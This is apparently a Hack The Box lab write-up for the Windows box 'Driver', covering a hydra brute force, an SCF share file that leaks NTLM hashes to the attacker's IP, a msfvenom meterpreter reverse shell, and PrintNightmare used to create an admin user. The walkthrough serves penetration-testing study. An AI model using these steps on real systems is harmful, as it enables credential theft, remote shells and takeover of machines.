Hackthebox - Driver

• Windows

Driver

• Box on HTB

Nmap

┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -p- 10.10.11.106    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 19:37 EDT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Potentially risky methods: TRACE
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-01T06:46:14
|_  start_date: 2022-05-01T06:42:07
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 7h07m35s, deviation: 0s, median: 7h07m34s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.54 seconds

Port 80

Inspecting with burp

The response header when trying to authenticate gives this (we can also see it in the nmap scan):

WWW-Authenticate: Basic realm="MFP Firmware Update Center. Please enter password for admin"

So we get username, we can try to bruteforce with hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.11.106 http-get

┌──(root💀kali)-[~]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.11.106 http-get                                                                                                                                                           255 ⨯
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-30 19:55:19
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.11.106:80/
[STATUS] 6124.00 tries/min, 6124 tries in 00:01h, 14338275 to do in 39:02h, 16 active
[STATUS] 6045.00 tries/min, 18135 tries in 00:03h, 14326264 to do in 39:30h, 16 active
[80][http-get] host: 10.10.11.106   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-30 19:58:36

• So we have admin:admin credentials

There is a file upload functionality and it says it will go in the share. It bugged me for a while and then I remember the URL File attack So I uploaded this file

[Shell]
Command=2
IconFile=\\10.10.14.2\share\legit.ico
[Taskbar]
Command=ToggleDesktop

• I named it with and @ at the begining for instance @csbygb

• And then we need to launch responder with smb server on obviously responder -w --lm -v -I tun0

• And we get hashes!

• Now we just have to crack one of them with hashcat

• We just need to copy a whole one like this tony::DRIVER:a05acd47ab1ac310:B15097FF39CD452C8F8E53BDC33B7B37:0101000000000000DF515CFA2F5DD801D1688BA244C5025400000000020000000000000000000000

• And then launch hashcat as follow hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

• And we get the password liltony

• Let's see what shares we have

┌──(root💀kali)-[~/Documents/hackthebox/driver]
└─# smbclient -L //10.10.11.106 -U 'tony'                                                                                                                                                                                                1 ⨯
Enter WORKGROUP\tony's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.106 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

• Let's use cracmapexec to see how we could use the creds

• Let's get a shell with evil-winrm evil-winrm -i 10.10.11.106 -u tony -p liltony

• It works! Let's grab our user flag in tony's desktop!

Privesc

• Let's get winpeas and execute it in our target

• In our kali wget https://github.com/carlospolop/PEASS-ng/releases/download/20220424/winPEASx64.exe

• Now we just have to upload it in our target with evilwinrm it really easy we just need to type upload winPEASx64.exe

• And we launch it .\winPEASx64.exe

• Winpeas shows that there is a powershell history file

• If we google the specific driver we have a privesc vuln

• Let's get a shell with msfconsole so that we can privesc using a metasploit module

• msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe -o reverse2.exe

• in our evvilwinrm shell upload reverse.exe

• I got annoyed with this exploit because I could not make it work

• I decided to use printnightmare instead

  • wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1

  • From evil winrm upload CVE-2021-1675.ps1

  • Import-Module .\CVE-2021-1675.ps1

  • Get-Command Invoke-Nightmare

  • Invoke-Nightmare -NewUser "csbygb" -NewPassword "csbygb123!"

  • Finally if we net user we see we are in the admin group net user csbygb

  • Now we just need to use evil-winrm with our new user evil-winrm -i 10.10.11.106 -u csbygb -p csbygb123!

  • And we can grab the admin flag

  • cd C:\Users\Administrator\Desktop

  • type root.txt